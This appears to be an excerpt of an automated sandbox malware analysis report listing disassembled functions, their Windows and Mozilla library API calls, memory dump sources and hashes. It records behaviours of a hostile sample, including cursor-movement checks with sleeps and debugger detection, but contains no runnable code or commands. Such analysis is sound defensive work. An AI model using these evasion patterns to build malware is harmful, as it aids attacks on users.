                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                          • Opcode ID: 68853b27d9f5895abda92d402b8bf059a610534911651e21b85f7a436f789877
                                                                                                                                                                                          • Instruction ID: ee825c03e1229ae80c2882c64a9a0388eb2e65489fe3ac8c86363a67d2c824ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68853b27d9f5895abda92d402b8bf059a610534911651e21b85f7a436f789877
                                                                                                                                                                                          • Instruction Fuzzy Hash: E902A831945251CFDB18CF19C4687AABBF6EF8730CF19C25AC8919BAA1C331D949C794
                                                                                                                                                                                          Function 6C462C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C462C31
                                                                                                                                                                                          • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C462C61
                                                                                                                                                                                            • Part of subcall function 6C414DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C414E5A
                                                                                                                                                                                            • Part of subcall function 6C414DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C414E97
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C462C82
                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C462E2D
                                                                                                                                                                                            • Part of subcall function 6C4281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4281DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                          • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                          • API String ID: 801438305-4149320968
                                                                                                                                                                                          • Opcode ID: e576ad57ab30d3f83a068065fd4c9589eff11573bba690c32d7318a026853196
                                                                                                                                                                                          • Instruction ID: 9bcd80c9e61409261dcf2f9bdcf1af8ee8e95954e11b69ddd500d170cf5b8435
                                                                                                                                                                                          • Opcode Fuzzy Hash: e576ad57ab30d3f83a068065fd4c9589eff11573bba690c32d7318a026853196
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2991C1706087809FD724CF25C490E9FF7E1AF8A358F10492DE59A8BB94DB30D549CB82
                                                                                                                                                                                          Function 0002180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00021823
                                                                                                                                                                                          • SetThreadDesktop.USER32(00000000), ref: 0002182A
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0002183A
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0002184A
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00021859
                                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 0002186B
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00021870
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0002187F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3283940658-0
                                                                                                                                                                                          • Opcode ID: 44461f28495114fea643e4fe3585176cf588568adba0d54509c3f0a80f3207e5
                                                                                                                                                                                          • Instruction ID: bf538529ef9ea6c25dfd3d98c05f9db3544e1f60585e61f4223b2396aa1e0e7c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44461f28495114fea643e4fe3585176cf588568adba0d54509c3f0a80f3207e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5111F32E1021AEBDB60DBE4EDC9BEE77F9AF54351F240866D501A2080DF74DA41CB60
                                                                                                                                                                                          Function 6C41D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                          • API String ID: 0-3654031807
                                                                                                                                                                                          • Opcode ID: 86c1456096ba96d38eedbf2be4d66dddbb3f679639ef6bc42bcafade42367680
                                                                                                                                                                                          • Instruction ID: eaa7eb184cf456fa5d6b1cacde65d85ff7d1eaf83a1b34e1c6f4926ad5273661
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86c1456096ba96d38eedbf2be4d66dddbb3f679639ef6bc42bcafade42367680
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E62BEB160C7458FD706CE18C090F6ABBF2AF86359F184A1DE4E54BF91D3359986CB82
                                                                                                                                                                                          Function 6C48545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?), ref: 6C488A4B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: ~qAl
                                                                                                                                                                                          • API String ID: 2221118986-1391548899
                                                                                                                                                                                          • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                          • Instruction ID: acfd8dc6d4bda0f9b35ca7806cfefd1c4ec05db924bdf082412d926cd705a0cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2B1D772E0621A8FDB14CF68CC90FA9B7B2EF95314F1802A9C549EB795D730D985CB90
                                                                                                                                                                                          Function 6C48542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?), ref: 6C4888F0
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C48925C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: ~qAl
                                                                                                                                                                                          • API String ID: 2221118986-1391548899
                                                                                                                                                                                          • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                          • Instruction ID: cda67fab704e6609f528f21123785f9d67a4e5dda0a0a4a34db16295b7461e68
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93B1C572E0650A8FDB14CF58CC81EADB7B2EF95314F140269C949EB785D731E98ACB90
                                                                                                                                                                                          Function 0004B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B10B
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B134
                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                          • Opcode ID: c0bbc5714f294603a991f1d394cc4a74bf7ffe277102f1a38af312f42a09aa31
                                                                                                                                                                                          • Instruction ID: 77f388d669254385d038683a6baca2567ded620cefc996ce1c73358683cddcfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bbc5714f294603a991f1d394cc4a74bf7ffe277102f1a38af312f42a09aa31
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01D471601706BAEB258B64EC56F9F36E8DB0436AF500075F501E40E1EB60DE41925D
                                                                                                                                                                                          Function 0003D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0003D44E
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0003D463
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0005332C), ref: 0003D46E
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0003D48A
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0003D491
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: 0e100af76b5f5aa9b2fd7d100276e3f2ff64e2b379622f3f94eb8db018f8badd
                                                                                                                                                                                          • Instruction ID: 7d260cd8bf4e522c9fa7527c345d55a56e46ba6b43d398bc23cc7a9eb4b76fe9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e100af76b5f5aa9b2fd7d100276e3f2ff64e2b379622f3f94eb8db018f8badd
                                                                                                                                                                                          • Instruction Fuzzy Hash: B821BEB4C01304EBE741DF24F948A497BB4BF58305F90811BE81CA6261E7BC99C28B56
                                                                                                                                                                                          Function 6C64CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64D086
                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C64D0B9
                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C64D138
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                          • Instruction ID: adb767c944b90e41e81721b64758baeba1dc0a7b84ca5deb7bd773836d1758ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD15A62F456464FEB14487CCCA13EAB7938783378F58C329D9229BBE5E6198847C349
                                                                                                                                                                                          Function 6C4CAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0dl$Pdl$pdl$winUnlock$winUnlockReadLock
                                                                                                                                                                                          • API String ID: 0-83310023
                                                                                                                                                                                          • Opcode ID: e36d439e002658651447b12e74640cf11a6a27c65e33af77af07422615675aef
                                                                                                                                                                                          • Instruction ID: 391023630e934e9f5dda0cb373c3e781bd9c3466387ea2b22be0662af33938f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e36d439e002658651447b12e74640cf11a6a27c65e33af77af07422615675aef
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0719D74608201AFDB04CF29D890EAABBF5FF8A318F14C618F95997311D730A985CBD6
                                                                                                                                                                                          Function 6C5EAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a801a5a08a67da65bab73bf0851728664f11588fc10e0a2a382212c5c9e04a00
                                                                                                                                                                                          • Instruction ID: caf2f866197b93b4b35ef762147f423e94afa69fa41a3086accf12c1cae9a108
                                                                                                                                                                                          • Opcode Fuzzy Hash: a801a5a08a67da65bab73bf0851728664f11588fc10e0a2a382212c5c9e04a00
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8F11375F022168BDB04DF2AC9803A977F4AB8F308F254629C900DB750EB749991CBE9
                                                                                                                                                                                          Function 6C5A0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C5A1052
                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C5A1086
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: h(Zl$h(Zl
                                                                                                                                                                                          • API String ID: 1297977491-728755956
                                                                                                                                                                                          • Opcode ID: 6c7774255afa2b6d090d4f843a656828ea5b3b5e8488b394ca614eb38c6de5b4
                                                                                                                                                                                          • Instruction ID: 3d7f7593e8847e680a2d6d4e991cca4ce56740c9cdb32f045217a524ef835ecb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c7774255afa2b6d090d4f843a656828ea5b3b5e8488b394ca614eb38c6de5b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A11F71B0125A9FDF08CF9AC8909EEBBB6BF8D314B148129E915A7700D735DD16CBA0
